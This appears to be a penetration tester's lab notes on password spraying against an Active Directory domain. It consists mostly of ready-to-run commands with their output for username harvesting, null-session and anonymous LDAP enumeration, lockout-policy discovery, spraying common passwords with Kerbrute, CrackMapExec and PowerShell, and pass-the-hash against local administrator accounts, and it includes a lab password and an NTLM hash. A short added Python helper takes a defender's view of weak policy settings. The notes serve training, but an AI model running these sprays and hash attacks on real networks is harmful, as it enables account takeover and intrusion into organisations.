Internal Password Spraying Attack
Making Target List
OSINT LinkedIn Scraping
C:\mrci0x1> linkedin2username -c Inlanefreight -o linkedin_usernames.txt
[+] Output saved to linkedin_usernames.txt
OSINT Email Harvesting
Search engine query: intext:"@inlanefreight.com" site:inlanefreight.com
Combine Username Lists
C:\mrci0x1> cat jsmith.txt linkedin_usernames.txt > combined_usernames.txt
Metadata Analysis
C:\mrci0x1> exiftool *.pdf > metadata.txt
Generate Username Combinations
#!/bin/bash
# Emit every 4-character combination of A-Z and 0-9 (36^4 = 1,679,616 lines)
for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}; do
    echo "$x"
done > guid_usernames.txt
Created username combinations
Now we can build a better list from the users we found for the organization, generating first/last-name permutations with automated tools:
$ username-generator -w site_users > user_gen.lst
$ username-anarchy -i site_users >> user_gen.lst
# deduplicate the generated user list
$ sort user_gen.lst | uniq > user_combined.lst
User Enumeration via Kerbrute
C:\mrci0x1> kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 combined_usernames.txt -o valid_users.txt
[+] VALID USERNAME: jjones@inlanefreight.local
[+] VALID USERNAME: sbrown@inlanefreight.local
[+] VALID USERNAME: tjohnson@inlanefreight.local
Incorporate Breach Data
C:\mrci0x1> echo "roger.grimes" >> valid_users.txt
SMB Null Sessions enum4linux
C:\mrci0x1> enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
administrator
guest
krbtgt
lab_adm
htb-student
avazquez
pfalcon
fanthony
wdillard
lbradford
sgage
asanchez
dbranch
ccruz
njohnson
mholliday
SMB Null Sessions rpcclient
C:\mrci0x1> rpcclient -U "" -N 172.16.5.5
rpcclient $> enumdomusers
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[lab_adm] rid:[0x3e9]
user:[htb-student] rid:[0x457]
user:[avazquez] rid:[0x458]
SMB Null Sessions CrackMapExec
C:\mrci0x1> crackmapexec smb 172.16.5.5 --users
INLANEFREIGHT.LOCAL\administrator
INLANEFREIGHT.LOCAL\guest
INLANEFREIGHT.LOCAL\lab_adm
INLANEFREIGHT.LOCAL\htb-student
INLANEFREIGHT.LOCAL\avazquez
LDAP Anonymous Bind ldapsearch
C:\mrci0x1> ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
guest
ACADEMY-EA-DC01$
htb-student
avazquez
pfalcon
fanthony
wdillard
lbradford
sgage
asanchez
dbranch
LDAP Anonymous Bind windapsearch
C:\mrci0x1> ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
Found: DC=INLANEFREIGHT,DC=LOCAL
Found 2906 users:
Guest
Htb Student
Annie Vazquez
Paul Falcon
Fae Anthony
Walter Dillard
Credentialed Enumeration CrackMapExec
C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users
INLANEFREIGHT.LOCAL\administrator badpwdcount: 1
INLANEFREIGHT.LOCAL\guest badpwdcount: 0
INLANEFREIGHT.LOCAL\lab_adm badpwdcount: 0
INLANEFREIGHT.LOCAL\htb-student badpwdcount: 0
INLANEFREIGHT.LOCAL\avazquez badpwdcount: 20
INLANEFREIGHT.LOCAL\pfalcon badpwdcount: 0
Password Attacks
Kerbrute Password Spray
C:\mrci0x1> kerbrute passwordspray -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 valid_users.txt Welcome1 -o spray_results.txt
VALID CREDENTIALS: bob.smith@inlanefreight.local:Welcome1
VALID CREDENTIALS: john.doe@inlanefreight.local:Welcome1
CrackMapExec Password Spray
C:\mrci0x1> crackmapexec smb 172.16.5.0/23 -u valid_users.txt -p passwords.txt --no-bruteforce > cme_spray_results.txt
INLANEFREIGHT.LOCAL\bob.smith:Welcome1
INLANEFREIGHT.LOCAL\john.doe:Welcome1
rpcclient Password Spray
C:\mrci0x1> for u in $(cat valid_users.txt); do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Account Name: tjohnson, Authority Name: INLANEFREIGHT
Account Name: sgage, Authority Name: INLANEFREIGHT
CrackMapExec Validate Credentials
C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123
INLANEFREIGHT.LOCAL\avazquez:Password123
CrackMapExec Password Spray (Local Administrator Accounts using NTLM hash)
C:\mrci0x1> sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
DomainPasswordSpray (PowerShell)
PS C:\mrci0x1> Import-Module .\DomainPasswordSpray.ps1
PS C:\mrci0x1> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
SUCCESS! User:sgage Password:Welcome1
SUCCESS! User:tjohnson Password:Welcome1
Kerbrute Password Spray (Windows)
PS C:\mrci0x1> .\kerbrute.exe passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
VALID LOGIN: sgage@inlanefreight.local:Welcome1
Password Policy Enumeration
CrackMapExec (Credentialed Enumeration - Linux)
C:\mrci0x1> crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
Minimum password length: 8
Password history length: 24
Maximum password age: Not Set
Password Complexity Flags: 000001
Domain Password Complex: 1
Minimum password age: 1 day 4 minutes
Reset Account Lockout Counter: 30 minutes
Locked Account Duration: 30 minutes
Account Lockout Threshold: 5
rpcclient (Non-Credentialed Enumeration - Linux)
C:\mrci0x1> rpcclient -U "" -N 172.16.5.5
rpcclient $> querydominfo
Total Users: 3650
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
enum4linux (Non-Credentialed Enumeration - Linux)
C:\mrci0x1> enum4linux -P 172.16.5.5
Minimum password length: 8
Password history length: 24
Maximum password age: Not Set
Password Complexity Flags: 000001
Minimum password age: 1 day 4 minutes
Reset Account Lockout Counter: 30 minutes
Locked Account Duration: 30 minutes
Account Lockout Threshold: 5
enum4linux-ng (Non-Credentialed Enumeration - Linux)
C:\mrci0x1> enum4linux-ng -P 172.16.5.5 -oA ilfreight
min_pw_length: 8
pw_history_length: 24
min_pw_age: 1 day 4 minutes
max_pw_age: not set
pw_properties: DOMAIN_PASSWORD_COMPLEX: true
lockout_threshold: 5
lockout_duration: 30 minutes
lockout_observation_window: 30 minutes
ldapsearch (Non-Credentialed Enumeration - Linux)
C:\mrci0x1> ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
lockoutThreshold: 5
minPwdLength: 8
pwdHistoryLength: 24
minPwdAge: -864000000000
maxPwdAge: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
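The raw ldapsearch values are negative counts of 100-nanosecond intervals, and maxPwdAge holds the 64-bit minimum when passwords never expire; the other tools above print the same policy already converted. This added example (not part of the original notes) does that conversion on the attribute lines quoted above and flags the settings a defender would tighten; the sample text, the 14-character baseline and the finding wording are assumptions for the example.

```python
import re

# LDAP stores these durations as negative counts of 100-nanosecond intervals;
# this sentinel is what maxPwdAge holds when passwords never expire ("Not Set").
TICKS_PER_SECOND = 10_000_000
NEVER = -9223372036854775808
DURATION_ATTRS = {"minPwdAge", "maxPwdAge", "lockoutDuration", "lockOutObservationWindow"}

# Constructed sample: the attribute lines from the ldapsearch output in the notes.
SAMPLE_LDAP_OUTPUT = """\
lockoutThreshold: 5
minPwdLength: 8
pwdHistoryLength: 24
minPwdAge: -864000000000
maxPwdAge: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
"""

def interval_to_text(raw: int) -> str:
    """Render a negative 100ns interval as 'N days N hours N minutes'."""
    if raw in (0, NEVER):
        return "Not Set"
    seconds = -raw // TICKS_PER_SECOND
    days, rem = divmod(seconds, 86400)
    hours, rem = divmod(rem, 3600)
    minutes = rem // 60
    parts = [f"{n} {unit}{'s' if n != 1 else ''}"
             for n, unit in ((days, "day"), (hours, "hour"), (minutes, "minute")) if n]
    return " ".join(parts) or "0 minutes"

def parse_policy(text: str) -> dict:
    """Parse 'attr: value' lines; duration attributes become readable strings."""
    policy = {}
    for m in re.finditer(r"^(\w+):\s*(-?\d+)\s*$", text, re.MULTILINE):
        attr, value = m.group(1), int(m.group(2))
        policy[attr] = interval_to_text(value) if attr in DURATION_ATTRS else value
    return policy

def weak_settings(policy: dict) -> list:
    """Findings a defender would raise: the settings that make spraying cheap."""
    findings = []
    if policy.get("lockoutThreshold", 0) == 0:
        findings.append("lockoutThreshold 0: no account lockout at all")
    if policy.get("minPwdLength", 0) < 14:  # CIS benchmark baseline is 14 characters
        findings.append("minPwdLength below 14")
    if policy.get("maxPwdAge") == "Not Set":
        findings.append("maxPwdAge Not Set: a guessed password never expires")
    return findings
```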
net.exe (Credentialed Enumeration - Windows)
PS C:\mrci0x1> net accounts
Minimum password age (days): 1
Maximum password age (days): Unlimited
Minimum password length: 8
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
PowerView (Credentialed Enumeration - Windows)
PS C:\mrci0x1> Import-Module .\PowerView.ps1
PS C:\mrci0x1> Get-DomainPolicy
MinimumPasswordAge=1
MaximumPasswordAge=-1
MinimumPasswordLength=8
PasswordComplexity=1
PasswordHistorySize=24
LockoutBadCount=5
ResetLockoutCount=30
LockoutDuration=30
net use SMB NULL Session (Non-Credentialed Enumeration - Windows)
PS C:\mrci0x1> net use \\DC01\ipc$ "" /u:""
The command completed successfully.